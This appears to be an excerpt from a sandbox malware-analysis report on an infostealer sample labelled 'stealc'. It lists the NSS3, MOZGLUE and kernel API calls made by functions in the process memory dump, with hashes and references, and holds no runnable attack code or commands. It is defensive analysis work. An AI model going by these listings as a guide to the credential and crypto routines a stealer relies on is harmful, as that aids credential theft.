Part of subcall function 6C8F14C0: EnterCriticalSection.KERNEL32 ref: 6C8F14F5
Part of subcall function 6C8F14C0: PR_Unlock.NSS3 ref: 6C8F150D

PORT_NewArena_Util.NSS3(00000400), ref: 6C902E1C
PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6C902E3B
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C902E95

Part of subcall function 6C8F1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C8988A4,00000000,00000000), ref: 6C8F1228
Part of subcall function 6C8F1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C8F1238
Part of subcall function 6C8F1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C8988A4,00000000,00000000), ref: 6C8F124B
Part of subcall function 6C8F1200: PR_CallOnce.NSS3(6C9F2AA4,6C8F12D0,00000000,00000000,00000000,?,6C8988A4,00000000,00000000), ref: 6C8F125D
Part of subcall function 6C8F1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C8F126F
Part of subcall function 6C8F1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C8F1280
Part of subcall function 6C8F1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C8F128E
Part of subcall function 6C8F1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C8F129A
Part of subcall function 6C8F1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C8F12A1

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
String ID:
API String ID: 1441289343-0
Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction ID: 52cd7c2f083b4cd28b15333e38f3c406ed095c317455a1634f235b1a769fa45c
Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction Fuzzy Hash: 5021F6B1E407454BE710CF549D48BAB3768AFA134CF11027DED1C5B742F7B2E6988292

Function 6C8BACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6C8BACC2

Part of subcall function 6C892F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C892F0A
Part of subcall function 6C892F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C892F1D

Part of subcall function 6C892AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6C890A1B,00000000), ref: 6C892AF0
Part of subcall function 6C892AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C892B11

CERT_DestroyCertList.NSS3(00000000), ref: 6C8BAD5E

Part of subcall function 6C8D57D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C89B41E,00000000,00000000,?,00000000,?,6C89B41E,00000000,00000000,00000001,?), ref: 6C8D57E0
Part of subcall function 6C8D57D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C8D5843

CERT_DestroyCertList.NSS3(?), ref: 6C8BAD36

Part of subcall function 6C892F50: CERT_DestroyCertificate.NSS3(?), ref: 6C892F65
Part of subcall function 6C892F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C892F83

free.MOZGLUE(?), ref: 6C8BAD4F

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
String ID:
API String ID: 132756963-0
Opcode ID: 4c141c1c1998dbbcb853422fa5e1dffe53016c47efb49fb10803ff1ef132ec8c
Instruction ID: b7333336e73c1cddb4709df1c2bf975501faf3d418d3a7a13443b0b9d09d8357
Opcode Fuzzy Hash: 4c141c1c1998dbbcb853422fa5e1dffe53016c47efb49fb10803ff1ef132ec8c
Instruction Fuzzy Hash: 1C21F3B2D012049BEB20DF6CDA055EEB7B4EF06219F594838D8057B700FB31AA49CBE1

Function 6C8E3C80 Relevance: 6.1, APIs: 4, Instructions: 65COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C8E3C9E
EnterCriticalSection.KERNEL32(?), ref: 6C8E3CAE
PR_Unlock.NSS3(?), ref: 6C8E3CEA
PR_SetError.NSS3(00000000,00000000), ref: 6C8E3D02

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: b0151ed06bf5b497d62860e9f91f84c520bf92e7f960cb5b188785d3033c6c83
Instruction ID: 5eb06d2dddc2f4af24f8a8d48380730359c5ad0a2ae1bdb0b2d8c722f1f3ca73
Opcode Fuzzy Hash: b0151ed06bf5b497d62860e9f91f84c520bf92e7f960cb5b188785d3033c6c83
Instruction Fuzzy Hash: 8611D679A04214AFDB10AF28ED44A9A3778EF1A368F154960EC0897722D731ED54CBE1

Function 6C8EECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6C8EF0AD,6C8EF150,?,6C8EF150,?,?,?), ref: 6C8EECBA

Part of subcall function 6C8F0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C8987ED,00000800,6C88EF74,00000000), ref: 6C8F1000
Part of subcall function 6C8F0FF0: PR_NewLock.NSS3(?,00000800,6C88EF74,00000000), ref: 6C8F1016
Part of subcall function 6C8F0FF0: PL_InitArenaPool.NSS3(00000000,security,6C8987ED,00000008,?,00000800,6C88EF74,00000000), ref: 6C8F102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6C8EECD1

Part of subcall function 6C8F10C0: TlsGetValue.KERNEL32(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F10F3
Part of subcall function 6C8F10C0: EnterCriticalSection.KERNEL32(?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F110C
Part of subcall function 6C8F10C0: PL_ArenaAllocate.NSS3(?,?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F1141
Part of subcall function 6C8F10C0: PR_Unlock.NSS3(?,?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F1182
Part of subcall function 6C8F10C0: TlsGetValue.KERNEL32(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F119C

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6C8EED02

Part of subcall function 6C8F10C0: PL_ArenaAllocate.NSS3(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F116E

PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6C8EED5A

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
String ID:
API String ID: 2957673229-0
Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction ID: 63d2a9e2ce90fd60ad095d7775145f881899f54ee5a4f1ae5e5055a9c579cd10
Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction Fuzzy Hash: 662101B1A007429BE310CF29DA44B52B7E4BFE9349F25C629E81C87B61EB70E594C7D0

Function 6C91EDB0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6C907FFA,?,6C909767,?,8B7874C0,0000A48E), ref: 6C91EDD4
realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6C907FFA,?,6C909767,?,8B7874C0,0000A48E), ref: 6C91EDFD
PORT_Alloc_Util.NSS3(?,00000000,00000000,6C907FFA,?,6C909767,?,8B7874C0,0000A48E), ref: 6C91EE14

Part of subcall function 6C8F0BE0: malloc.MOZGLUE(6C8E8D2D,?,00000000,?), ref: 6C8F0BF8
Part of subcall function 6C8F0BE0: TlsGetValue.KERNEL32(6C8E8D2D,?,00000000,?), ref: 6C8F0C15

memcpy.VCRUNTIME140(?,?,6C909767,00000000,00000000,6C907FFA,?,6C909767,?,8B7874C0,0000A48E), ref: 6C91EE33

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 3903481028-0
Opcode ID: 047f39ce2e6f66504732823f6923cfa6b3230e58c12ef7c8db79181c85657a06
Instruction ID: 43cd4798154ecdb87871dcaf5bbc4e70967c1563f19fa6dc7f0a613a00e7a47a
Opcode Fuzzy Hash: 047f39ce2e6f66504732823f6923cfa6b3230e58c12ef7c8db79181c85657a06
Instruction Fuzzy Hash: 9511C2B5A0871AABEB109E65DC8AB56B7ACFF1435CF204531E919C2E40E330F464C7E2

Function 6C8B8DD0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C8B8DE7
EnterCriticalSection.KERNEL32 ref: 6C8B8DFC
PR_Unlock.NSS3 ref: 6C8B8E2D
PR_SetError.NSS3 ref: 6C8B8E49

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: 3cd2fe732f3e9bce6daec72ea5fee48ae4dea259dd2ae501e494adc4907f4671
Instruction ID: a8080346b438043348a87d65f2cc0a610799a46eb269e55041d376a6c1231265
Opcode Fuzzy Hash: 3cd2fe732f3e9bce6daec72ea5fee48ae4dea259dd2ae501e494adc4907f4671
Instruction Fuzzy Hash: 54118FB5609A159FD700BF78D6841A9BBF4FF05314F054929EC8897B00E730E854CBD2

Function 6C93AC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6C925F17,?,?,?,?,?,?,?,?,6C92AAD4), ref: 6C93AC94
PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6C925F17,?,?,?,?,?,?,?,?,6C92AAD4), ref: 6C93ACA6
free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6C92AAD4), ref: 6C93ACC0
free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6C92AAD4), ref: 6C93ACDB

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: free$DestroyFreeK11_Monitor
String ID:
API String ID: 3989322779-0
Opcode ID: 872ff65b8225a76cfc83d32f70efd24bc3b243476de0f115383e1dc992fae6de
Instruction ID: a947bcaf37f33090620fbb48ba0f9defe0bb47568db4ff5db7ba7bea3b5b0e17
Opcode Fuzzy Hash: 872ff65b8225a76cfc83d32f70efd24bc3b243476de0f115383e1dc992fae6de
Instruction Fuzzy Hash: 02019EB5601B219BEB60DF69E908743B7ECBF446A9B104839D85EC3E00EB30F414CB91

Function 6C8A1DD0 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

CERT_DestroyCertificate.NSS3(?), ref: 6C8A1DFB

Part of subcall function 6C8995B0: TlsGetValue.KERNEL32(00000000,?,6C8B00D2,00000000), ref: 6C8995D2
Part of subcall function 6C8995B0: EnterCriticalSection.KERNEL32(?,?,?,6C8B00D2,00000000), ref: 6C8995E7
Part of subcall function 6C8995B0: PR_Unlock.NSS3(?,?,?,?,6C8B00D2,00000000), ref: 6C899605

PR_EnterMonitor.NSS3 ref: 6C8A1E09

Part of subcall function 6C959090: TlsGetValue.KERNEL32 ref: 6C9590AB
Part of subcall function 6C959090: TlsGetValue.KERNEL32 ref: 6C9590C9
Part of subcall function 6C959090: EnterCriticalSection.KERNEL32 ref: 6C9590E5
Part of subcall function 6C959090: TlsGetValue.KERNEL32 ref: 6C959116
Part of subcall function 6C959090: LeaveCriticalSection.KERNEL32 ref: 6C95913F

Part of subcall function 6C89E190: PR_EnterMonitor.NSS3(?,?,6C89E175), ref: 6C89E19C
Part of subcall function 6C89E190: PR_EnterMonitor.NSS3(6C89E175), ref: 6C89E1AA
Part of subcall function 6C89E190: PR_ExitMonitor.NSS3 ref: 6C89E208
Part of subcall function 6C89E190: PL_HashTableRemove.NSS3(?), ref: 6C89E219
Part of subcall function 6C89E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C89E231
Part of subcall function 6C89E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C89E249
Part of subcall function 6C89E190: PR_ExitMonitor.NSS3 ref: 6C89E257

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C8A1E37
PR_ExitMonitor.NSS3 ref: 6C8A1E4A

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Monitor$Enter$Value$CriticalExitSection$Arena_FreeUtil$CertificateDestroyErrorHashLeaveRemoveTableUnlock
String ID:
API String ID: 499896158-0
Opcode ID: 568917fb89b73742cfe52da91b687fbb6b797ed2956c99aa084e197e3001e939
Instruction ID: f20e1e0eee927a252ab08c2ce86ee763db7bf80fdbe650321f7deedc7545943b
Opcode Fuzzy Hash: 568917fb89b73742cfe52da91b687fbb6b797ed2956c99aa084e197e3001e939
Instruction Fuzzy Hash: 1C012BB1B04164D7EB204BAAED00F4777B8AB5175CF201430E42897B50E771E836CBD1

Function 6C8A1D50 Relevance: 6.0, APIs: 4, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C8A1D75
PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C8A1D89
PORT_ZAlloc_Util.NSS3(00000010), ref: 6C8A1D9C
free.MOZGLUE(00000000), ref: 6C8A1DB8

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Alloc_Util$Errorfree
String ID:
API String ID: 939066016-0
Opcode ID: 658afd2955d060ffe09421950eacfdbe122563a13e9f0856f1ac4f58af036d8d
Instruction ID: f57a8bf85ef4d30b4500dd3c60f2295b019f3bae5eaa1b6483e624324df182d1
Opcode Fuzzy Hash: 658afd2955d060ffe09421950eacfdbe122563a13e9f0856f1ac4f58af036d8d
Instruction Fuzzy Hash: 06F049B660521097FF301F996E41B4736489F9178AF100A35ED6C47B00D720E40683E1

Function 6C93AC00 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,6C925D40,00000000,?,?,6C916AC6,6C92639C), ref: 6C93AC2D

Part of subcall function 6C8DADC0: TlsGetValue.KERNEL32(?,6C8BCDBB,?,6C8BD079,00000000,00000001), ref: 6C8DAE10
Part of subcall function 6C8DADC0: EnterCriticalSection.KERNEL32(?,?,6C8BCDBB,?,6C8BD079,00000000,00000001), ref: 6C8DAE24
Part of subcall function 6C8DADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C8BD079,00000000,00000001), ref: 6C8DAE5A
Part of subcall function 6C8DADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C8BCDBB,?,6C8BD079,00000000,00000001), ref: 6C8DAE6F
Part of subcall function 6C8DADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C8BCDBB,?,6C8BD079,00000000,00000001), ref: 6C8DAE7F
Part of subcall function 6C8DADC0: TlsGetValue.KERNEL32(?,6C8BCDBB,?,6C8BD079,00000000,00000001), ref: 6C8DAEB1
Part of subcall function 6C8DADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C8BCDBB,?,6C8BD079,00000000,00000001), ref: 6C8DAEC9

PK11_FreeSymKey.NSS3(?,6C925D40,00000000,?,?,6C916AC6,6C92639C), ref: 6C93AC44
SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,6C925D40,00000000,?,?,6C916AC6,6C92639C), ref: 6C93AC59
free.MOZGLUE(8CB6FF01,6C916AC6,6C92639C,?,?,?,?,?,?,?,?,?,6C925D40,00000000,?,6C92AAD4), ref: 6C93AC62

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
String ID:
API String ID: 1595327144-0
Opcode ID: 3380e7fcbdf8fef1ee38598082f1b86f52fb1bc9cc64855cd7ac434a541dd680
Instruction ID: 1f4f26d4ceb41ed937824afec89358335e7580bd76893f59822ee9d55d0194e1
Opcode Fuzzy Hash: 3380e7fcbdf8fef1ee38598082f1b86f52fb1bc9cc64855cd7ac434a541dd680
Instruction Fuzzy Hash: 56018BB56002109FDF10DF59E9C0B8677ACAF98B5DF188468E84D8F706DB30E808CBA1

Function 6C8EFD80 Relevance: 6.0, APIs: 4, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C899003,?), ref: 6C8EFD91

Part of subcall function 6C8F0BE0: malloc.MOZGLUE(6C8E8D2D,?,00000000,?), ref: 6C8F0BF8
Part of subcall function 6C8F0BE0: TlsGetValue.KERNEL32(6C8E8D2D,?,00000000,?), ref: 6C8F0C15

PORT_Alloc_Util.NSS3(A4686C8F,?), ref: 6C8EFDA2
memcpy.VCRUNTIME140(00000000,12D068C3,A4686C8F,?,?), ref: 6C8EFDC4
free.MOZGLUE(00000000,?,?), ref: 6C8EFDD1

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Alloc_Util$Valuefreemallocmemcpy
String ID:
API String ID: 2335489644-0
Opcode ID: 54df3fa87e3f842639d8fe4cfd31debfe8d710a0085c25f5fbe5e4c672fe6a95
Instruction ID: 95509f5d2a5e8d0d0b55442e2a0b254ddd0e9c80b660e0837c497e6bbbad31a5
Opcode Fuzzy Hash: 54df3fa87e3f842639d8fe4cfd31debfe8d710a0085c25f5fbe5e4c672fe6a95
Instruction Fuzzy Hash: E4F0FCF17012066BEF104F55FD809577F58EFA929AB148534ED198BB01E722D815C7E1

Function 6C9ACC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?), ref: 6C9ACC61
free.MOZGLUE ref: 6C9ACC6E
DeleteCriticalSection.KERNEL32(?), ref: 6C9ACC80
free.MOZGLUE(?), ref: 6C9ACC87

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: CriticalDeleteSectionfree
String ID:
API String ID: 2988086103-0
Opcode ID: 50556a8d684f7df0363f3eac9649411fc18f40982b156b184fc61cd47e41f030
Instruction ID: 7171d0584dab3b33108082997c4869a8d4d0c0e99064989c27d188249977b4e8
Opcode Fuzzy Hash: 50556a8d684f7df0363f3eac9649411fc18f40982b156b184fc61cd47e41f030
Instruction Fuzzy Hash: 18E03076704618ABCB10EFA8DC448867BACEF4D2703190525E691D3700D231F905CBA1

Function 6C889DC0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 220COMMON

Download Yara Rule

APIs

sqlite3_value_text.NSS3 ref: 6C889E1F

Part of subcall function 6C8413C0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6C812352,?,00000000,?,?), ref: 6C841413
Part of subcall function 6C8413C0: memcpy.VCRUNTIME140(00000000,6C812352,00000002,?,?,?,?,6C812352,?,00000000,?,?), ref: 6C8414C0

Strings

LIKE or GLOB pattern too complex, xrefs: 6C88A006
ESCAPE expression must be a single character, xrefs: 6C889F78

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
